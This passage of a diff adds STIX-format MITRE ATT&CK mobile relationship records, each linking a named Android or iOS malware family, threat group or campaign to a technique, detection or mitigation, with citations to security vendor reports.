This is accomplished by receiving the `android.accessibilityservice.AccessibilityService` intent.(Citation: ESET DEFENSOR ID)", + "relationship_type": "uses", + "source_ref": "malware--5a5dca4c-03c1-4b99-bfcf-c206e20aa663", + "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--e3a961ec-8184-4143-b8c2-c33ea0503678", + "type": "relationship", + "created": "2020-09-24T15:34:51.315Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-Dendroid", + "description": "Marc Rogers. (2014, March 6). Dendroid malware can take over your camera, record audio, and sneak into Google Play. Retrieved December 22, 2016.", + "url": "https://blog.lookout.com/blog/2014/03/06/dendroid/" + } + ], + "modified": "2020-09-24T15:34:51.315Z", + "description": "[Dendroid](https://attack.mitre.org/software/S0301) can take photos and record videos.(Citation: Lookout-Dendroid)", + "relationship_type": "uses", + "source_ref": "malware--317a2c10-d489-431e-b6b2-f0251fddc88e", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3d65c2b7-c907-45e1-b942-95f7d765e749", + "created": "2023-03-20T18:53:34.056Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:53:34.056Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--764ee29e-48d6-4934-8e6b-7a606aaaafc0", + "target_ref": 
"attack-pattern--d916f176-a1ca-4a78-9fdd-4058bc28162e", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2d1b46d5-cc2e-4312-adf2-43fb130a506b", + "created": "2021-02-17T20:49:24.542Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:22:40.300Z", + "description": "[DoubleAgent](https://attack.mitre.org/software/S0550) can run arbitrary shell commands.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--3d6c4389-3489-40a3-beda-c56e650b6f68", + "target_ref": "attack-pattern--693cdbff-ea73-49c6-ac3f-91e7285c31d1", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c61c16a9-8d1a-4329-b784-ba71f8421b33", + "created": "2023-03-20T19:00:09.608Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T19:00:09.608Z", + "description": "", + "relationship_type": "detects", + "source_ref": 
"x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f", + "target_ref": "attack-pattern--20b0931a-8952-42ca-975f-775bad295f1a", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--7b3fa5cb-bd70-47e0-acfb-7db99e29e70f", + "created": "2022-04-01T18:49:19.284Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Recent versions of Android modified how device administrator applications are uninstalled, making it easier for the user to remove them. Android 7 introduced updates that revoke standard device administrators’ ability to reset the device’s passcode.", + "modified": "2022-04-01T18:49:19.284Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--acf8fd2a-dc98-43b4-8d37-64e10728e591", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--bd1e016a-1ebb-4f30-9342-998f656dd8b8", + "created": "2022-04-15T15:57:32.958Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. 
Retrieved July 15, 2020.", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:21:49.009Z", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) can enable app installation from unknown sources.(Citation: Bitdefender Mandrake)", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--fcb11f06-ce0e-490b-bcc1-04a1623579f0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--17adf4c2-e278-41fc-9183-cda5c8b74de7", + "created": "2022-03-31T19:53:01.320Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-31T19:53:01.320Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--1d44f529-6fe6-489f-8a01-6261ac43f05e", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--eca69d9c-7c27-4147-ad7a-a1c30317df1d", + "type": "relationship", + "created": "2019-08-09T18:06:11.672Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + 
"description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "source_name": "Lookout Dark Caracal Jan 2018" + } + ], + "modified": "2019-08-09T18:06:11.672Z", + "description": "[Pallas](https://attack.mitre.org/software/S0399) can take pictures with both the front and rear-facing cameras.(Citation: Lookout Dark Caracal Jan 2018)", + "relationship_type": "uses", + "source_ref": "malware--c41a8b7c-3e42-4eee-b87d-ad8a100ee878", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--910009da-65c0-4e6a-aeb2-386c643d1c0e", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Zscaler-SuperMarioRun", + "description": "Viral Gandhi. (2017, January 12). Super Mario Run Malware #2 – DroidJack RAT. 
Retrieved January 20, 2017.", + "url": "https://www.zscaler.com/blogs/security-research/super-mario-run-malware-2-droidjack-rat" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:24:53.701Z", + "description": "[DroidJack](https://attack.mitre.org/software/S0320) captures SMS data.(Citation: Zscaler-SuperMarioRun)", + "relationship_type": "uses", + "source_ref": "malware--05c4f87c-be8f-46ea-8d9a-2a0aad8f52c1", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--48552acc-5f1a-422f-90fa-37108446f36d", + "created": "2022-03-30T19:14:20.374Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-30T19:14:20.374Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--039bc59c-ecc7-4997-b2b4-4ab728bd91aa", + "target_ref": "attack-pattern--1ff89c1b-7615-4fe8-b9cb-63aaf52e6dee", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--60db521a-ae2d-4a9a-8c6d-47a5528f1ecb", + "type": "relationship", + "created": "2020-01-27T17:05:58.308Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East. 
Retrieved January 27, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/", + "source_name": "Trend Micro Bouncing Golf 2019" + } + ], + "modified": "2020-01-27T17:05:58.308Z", + "description": "[GolfSpy](https://attack.mitre.org/software/S0421) encodes its configurations using a customized algorithm.(Citation: Trend Micro Bouncing Golf 2019)", + "relationship_type": "uses", + "source_ref": "malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0b1e5e78-9ee1-4fc3-9fe7-dc069b59e77d", + "created": "2020-05-04T14:04:56.179Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Google Bread", + "url": "https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html", + "description": "A. Guertin, V. Kotov, Android Security & Privacy Team. (2020, January 9). PHA Family Highlights: Bread (and Friends) . Retrieved April 27, 2020." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Bread](https://attack.mitre.org/software/S0432) payloads have used several commercially available packers.(Citation: Google Bread)", + "modified": "2022-04-15T17:20:54.552Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--108b2817-bc01-404e-8e1b-8cdeec846326", + "target_ref": "attack-pattern--51636761-2e35-44bf-9e56-e337adf97174", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1f8f0021-6992-476c-ba1c-232542dc1633", + "created": "2023-03-20T18:58:52.857Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:58:52.857Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--65803bfa-7601-44ad-95ea-64d8bfd778a4", + "type": "relationship", + "created": "2020-04-08T15:51:25.157Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "ThreatFabric Ginp", + "url": "https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html", + "description": "ThreatFabric. (2019, November). Ginp - A malware patchwork borrowing from Anubis. Retrieved April 8, 2020." 
+ } + ], + "modified": "2020-04-08T15:51:25.157Z", + "description": "[Ginp](https://attack.mitre.org/software/S0423) can capture device screenshots and stream them back to the C2.(Citation: ThreatFabric Ginp)", + "relationship_type": "uses", + "source_ref": "malware--6146be90-470c-4049-bb3a-9986b8ffb65b", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3616bacc-6f6e-41f2-832c-cdbbae9622f3", + "created": "2020-11-24T17:55:12.830Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Talos GPlayed", + "description": "V. Ventura. (2018, October 11). GPlayed Trojan - .Net playing with Google Market . Retrieved November 24, 2020.", + "url": "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:21:42.102Z", + "description": "[GPlayed](https://attack.mitre.org/software/S0536) can read SMS messages.(Citation: Talos GPlayed)", + "relationship_type": "uses", + "source_ref": "malware--a993495c-9813-4372-b9ec-d168c7f7ec0a", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--bba8b056-acbe-4fed-b890-965a446d7a3c", + "created": "2022-04-01T18:45:00.923Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Users should be warned against granting access to accessibility features and 
device administration services, and to carefully scrutinize applications that request these dangerous permissions. Users should be taught how to boot into safe mode to uninstall malicious applications that may be interfering with the uninstallation process.", + "modified": "2022-04-01T18:45:00.923Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--dc01774a-d1c1-45fb-b506-0a5d1d6593d9", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--71490fdb-e271-4a67-b932-5288924b1dae", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "PaloAlto-DualToy", + "description": "Claud Xiao. (2016, September 13). DualToy: New Windows Trojan Sideloads Risky Apps to Android and iOS Devices. 
Retrieved January 24, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[DualToy](https://attack.mitre.org/software/S0315) collects the connected iOS device’s information including IMEI, IMSI, ICCID, serial number and phone number.(Citation: PaloAlto-DualToy)", + "relationship_type": "uses", + "source_ref": "malware--507fe748-5e4a-4b45-9e9f-8b1115f4e878", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e87aa0d6-241f-4f72-bdb6-54e8d5584ae2", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "NYTimes-BackDoor", + "description": "Matt Apuzzo and Michael S. Schmidt. (2016, November 15). Secret Back Door in Some U.S. Phones Sent Data to China, Analysts Say. 
Retrieved February 6, 2017.", + "url": "https://www.nytimes.com/2016/11/16/us/politics/china-phones-software-security.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:42:14.121Z", + "description": "[Adups](https://attack.mitre.org/software/S0309) transmitted call logs.(Citation: NYTimes-BackDoor)", + "relationship_type": "uses", + "source_ref": "malware--f6ac21b6-2592-400c-8472-10d0e2f1bfaf", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--7accde36-cb29-43c6-8c66-6486efd867a8", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-StealthMango", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. 
Retrieved September 27, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf" + } + ], + "modified": "2019-10-10T15:27:22.157Z", + "description": "[Tangelo](https://attack.mitre.org/software/S0329) contains functionality to gather GPS coordinates.(Citation: Lookout-StealthMango)", + "relationship_type": "uses", + "source_ref": "malware--35aae10a-97c5-471a-9c67-02c231a7a31a", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a5b37f26-7629-4195-9536-12e349e5843b", + "created": "2023-03-20T18:51:04.334Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:51:04.334Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--6ffad4be-bfe0-424f-abde-4d9a84a800ad", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--4a67b14a-e489-4e8f-b545-5bdf134e146e", + "type": "relationship", + "created": "2020-04-24T15:06:33.519Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "TrendMicro Coronavirus Updates", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/", + "description": "T. Bao, J. Lu. (2020, April 14). Coronavirus Update App Leads to Project Spy Android and iOS Spyware. 
Retrieved April 24, 2020." + } + ], + "modified": "2020-04-24T15:06:33.519Z", + "description": "[Corona Updates](https://attack.mitre.org/software/S0425) can collect messages from GSM, WhatsApp, Telegram, Facebook, and Threema by reading the application’s notification content.(Citation: TrendMicro Coronavirus Updates)", + "relationship_type": "uses", + "source_ref": "malware--366c800f-97a8-48d5-b0a6-79d00198252a", + "target_ref": "attack-pattern--39dd7871-f59b-495f-a9a5-3cb8cc50c9b2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3841024e-1047-40fa-9e25-ac6d5c14612a", + "created": "2023-02-28T21:41:22.768Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cloudmark_tanglebot_0921", + "description": "Felipe Naves, Andrew Conway, W. Stuart Jones, Adam McNeil . (2021, September 23). TangleBot: New Advanced SMS Malware Targets Mobile Users Across U.S. and Canada with COVID-19 Lures. 
Retrieved February 28, 2023.", + "url": "https://www.cloudmark.com/en/blog/malware/tanglebot-new-advanced-sms-malware-targets-mobile-users-across-us-and-canada-covid-19" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-29T21:25:52.302Z", + "description": "[TangleBot](https://attack.mitre.org/software/S1069) can request permission to view device contacts.(Citation: cloudmark_tanglebot_0921)", + "relationship_type": "uses", + "source_ref": "malware--68156e5a-4c3a-46dd-9c5e-c0bfdec6651f", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4cb926c1-c242-45c2-be46-07c22435a8a5", + "created": "2022-09-30T19:23:02.689Z", + "revoked": false, + "external_references": [ + { + "source_name": "Cylance Dust Storm", + "description": "Gross, J. (2016, February 23). Operation Dust Storm. 
Retrieved December 22, 2021.", + "url": "https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-30T19:23:02.689Z", + "description": "During [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors used Android backdoors that would send information and data from a victim's mobile device to the C2 servers.(Citation: Cylance Dust Storm)", + "relationship_type": "uses", + "source_ref": "campaign--4603cf2f-06d0-4970-9c5d-5071b08c817f", + "target_ref": "attack-pattern--32063d7f-0a39-440d-a4a3-2694488f96cc", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--bd889077-d4bd-4475-8e1f-6f507a7bedb9", + "created": "2022-04-01T13:19:41.207Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-01T13:19:41.207Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--4e6620ac-c30c-4f6d-918e-fa20cae7c1ce", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9b8b51fb-c380-4516-b109-821f015506d4", + "created": "2023-03-20T15:40:26.994Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + 
"modified": "2023-03-20T15:40:26.994Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--61071d73-fcdf-4820-afd0-e3f0983e0a71", + "created": "2019-07-10T15:42:09.606Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Dark Caracal Jan 2018", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:01:46.513Z", + "description": "[Dark Caracal](https://attack.mitre.org/groups/G0070) controls implants using standard HTTP communication.(Citation: Lookout Dark Caracal Jan 2018) ", + "relationship_type": "uses", + "source_ref": "intrusion-set--8a831aaa-f3e0-47a3-bed8-a9ced744dd12", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--08c81253-975c-4780-8e85-c72bc6a90c88", + "created": "2020-10-29T19:21:23.225Z", + "x_mitre_version": "1.0", + "external_references": [ + { 
+ "source_name": "WeLiveSecurity AdDisplayAshas", + "url": "https://www.welivesecurity.com/2019/10/24/tracking-down-developer-android-adware/", + "description": "L. Stefanko. (2019, October 24). Tracking down the developer of Android adware affecting millions of users. Retrieved October 29, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Android/AdDisplay.Ashas](https://attack.mitre.org/software/S0525) can generate revenue by automatically displaying ads.(Citation: WeLiveSecurity AdDisplayAshas)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--f7e7b736-2cff-4c2a-9232-352cd383463a", + "target_ref": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0c558826-5cea-422e-8e67-83e53c04d409", + "created": "2020-06-26T15:32:25.146Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "CheckPoint Cerberus", + "url": "https://research.checkpoint.com/2020/mobile-as-attack-vector-using-mdm/", + "description": "A. Hazum, B. Melnykov, C. Efrati, D. Golubenko, I. Wernik, L. Kuperman, O. Mana. (2020, April 29). First seen in the wild – Malware uses Corporate MDM as attack vector. Retrieved June 26, 2020." 
